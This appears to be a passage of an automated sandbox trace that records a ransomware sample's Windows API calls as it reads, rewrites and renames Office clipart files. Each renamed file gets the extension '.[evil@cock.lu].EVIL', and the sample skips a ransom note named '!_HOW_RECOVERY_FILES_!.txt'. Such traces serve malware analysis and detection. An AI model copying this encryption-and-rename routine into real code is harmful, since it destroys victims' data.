[0128.206] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF", dwFileAttributes=0x200) returned 0 [0128.206] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.213] wcsstr (_Str="J0099150.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.213] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG") returned 69 [0128.213] wcscmp (_String1="J0099150.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.213] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099150.JPG") returned 0x0 [0128.213] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG") returned 0x45 [0128.214] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099150.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.216] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x559a, lpOverlapped=0x0) returned 1 [0128.228] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.228] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.228] _errno () returned 0x84b1160840 [0128.229] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.229] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x55a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x55a0, lpOverlapped=0x0) returned 1 [0128.229] CloseHandle (hObject=0x1a8) returned 1 [0128.229] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.229] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.229] __uncaught_exception () returned 0x84b1160800 [0128.229] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.230] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099150.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099150.jpg.[evil@cock.lu].evil")) returned 1 [0128.243] ??_V@YAXPEAX@Z () returned 0x1 [0128.247] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG", dwFileAttributes=0x200) returned 0 [0128.247] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.247] wcsstr (_Str="J0099151.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.247] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF") returned 69 [0128.247] wcscmp (_String1="J0099151.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.247] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099151.WMF") returned 0x0 [0128.247] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF") returned 0x45 [0128.247] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099151.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.250] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x65e6, lpOverlapped=0x0) returned 1 [0128.281] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.281] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.282] _errno () returned 0x84b1160840 [0128.282] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.282] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6600, lpOverlapped=0x0) returned 1 [0128.282] CloseHandle (hObject=0x1a8) returned 1 [0128.282] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.282] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.282] __uncaught_exception () returned 0x84b1160800 [0128.282] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.283] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099151.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099151.wmf.[evil@cock.lu].evil")) returned 1 [0128.284] ??_V@YAXPEAX@Z () returned 0x1 [0128.287] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF", dwFileAttributes=0x200) returned 0 [0128.287] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.287] wcsstr (_Str="J0099152.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.287] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG") returned 69 [0128.287] wcscmp (_String1="J0099152.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.287] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099152.JPG") returned 0x0 [0128.287] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG") returned 0x45 [0128.287] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099152.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.290] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2dae, lpOverlapped=0x0) returned 1 [0128.299] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.299] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0128.299] _errno () returned 0x84b1160840 [0128.299] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.299] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2dc0, lpOverlapped=0x0) returned 1 [0128.299] CloseHandle (hObject=0x1a8) returned 1 [0128.299] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0128.299] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0128.300] __uncaught_exception () returned 0x84b1160800 [0128.300] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0128.300] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099152.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099152.jpg.[evil@cock.lu].evil")) returned 1 [0128.301] ??_V@YAXPEAX@Z () returned 0x1 [0128.305] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099152.JPG", dwFileAttributes=0x200) returned 0 [0128.305] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0128.305] wcsstr (_Str="J0099153.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0128.305] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF") returned 69 [0128.306] wcscmp (_String1="J0099153.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0128.306] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099153.WMF") returned 0x0 [0128.306] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF") returned 0x45 [0128.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099153.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0128.308] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3632, lpOverlapped=0x0) returned 1 [0129.028] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.028] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.028] _errno () returned 0x84b1160840 [0129.028] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.028] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3640, lpOverlapped=0x0) returned 1 [0129.028] CloseHandle (hObject=0x1a8) returned 1 [0129.029] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.029] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.029] __uncaught_exception () returned 0x84b1160800 [0129.029] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.029] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099153.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099153.wmf.[evil@cock.lu].evil")) returned 1 [0129.040] ??_V@YAXPEAX@Z () returned 0x1 [0129.044] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF", dwFileAttributes=0x200) returned 0 [0129.044] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.045] wcsstr (_Str="J0099154.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.045] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG") returned 69 [0129.045] wcscmp (_String1="J0099154.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.045] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099154.JPG") returned 0x0 [0129.045] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG") returned 0x45 [0129.045] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099154.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.047] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b11, lpOverlapped=0x0) returned 1 [0129.077] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.077] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.077] _errno () returned 0x84b1160840 [0129.077] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.077] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b20, lpOverlapped=0x0) returned 1 [0129.077] CloseHandle (hObject=0x1a8) returned 1 [0129.077] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.078] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.078] __uncaught_exception () returned 0x84b1160800 [0129.078] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.078] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099154.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099154.jpg.[evil@cock.lu].evil")) returned 1 [0129.079] ??_V@YAXPEAX@Z () returned 0x1 [0129.082] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099154.JPG", dwFileAttributes=0x200) returned 0 [0129.083] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.083] wcsstr (_Str="J0099155.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.083] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG") returned 69 [0129.083] wcscmp (_String1="J0099155.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.083] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099155.JPG") returned 0x0 [0129.083] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG") returned 0x45 [0129.083] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099155.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.085] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x227a, lpOverlapped=0x0) returned 1 [0129.097] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.097] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.097] _errno () returned 0x84b1160840 [0129.097] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.097] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x2280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2280, lpOverlapped=0x0) returned 1 [0129.097] CloseHandle (hObject=0x1a8) returned 1 [0129.097] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.098] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.098] __uncaught_exception () returned 0x84b1160800 [0129.098] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.098] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099155.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099155.jpg.[evil@cock.lu].evil")) returned 1 [0129.099] ??_V@YAXPEAX@Z () returned 0x1 [0129.102] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG", dwFileAttributes=0x200) returned 0 [0129.102] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.102] wcsstr (_Str="J0099156.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.102] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG") returned 69 [0129.102] wcscmp (_String1="J0099156.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.103] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099156.JPG") returned 0x0 [0129.103] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG") returned 0x45 [0129.103] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099156.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.105] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3682, lpOverlapped=0x0) returned 1 [0129.137] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.137] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.137] _errno () returned 0x84b1160840 [0129.137] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.137] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x36a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x36a0, lpOverlapped=0x0) returned 1 [0129.137] CloseHandle (hObject=0x1a8) returned 1 [0129.137] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.138] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.138] __uncaught_exception () returned 0x84b1160800 [0129.138] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.138] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099156.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099156.jpg.[evil@cock.lu].evil")) returned 1 [0129.139] ??_V@YAXPEAX@Z () returned 0x1 [0129.142] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099156.JPG", dwFileAttributes=0x200) returned 0 [0129.142] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.142] wcsstr (_Str="J0099157.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.142] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG") returned 69 [0129.142] wcscmp (_String1="J0099157.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.142] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099157.JPG") returned 0x0 [0129.142] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG") returned 0x45 [0129.143] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099157.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.177] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x25c7, lpOverlapped=0x0) returned 1 [0129.254] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.254] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.254] _errno () returned 0x84b1160840 [0129.254] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.254] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x25e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x25e0, lpOverlapped=0x0) returned 1 [0129.255] CloseHandle (hObject=0x1a8) returned 1 [0129.255] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.255] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.255] __uncaught_exception () returned 0x84b1160800 [0129.255] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.255] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099157.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099157.jpg.[evil@cock.lu].evil")) returned 1 [0129.284] ??_V@YAXPEAX@Z () returned 0x1 [0129.288] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099157.JPG", dwFileAttributes=0x200) returned 0 [0129.288] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.288] wcsstr (_Str="J0099158.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.288] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF") returned 69 [0129.288] wcscmp 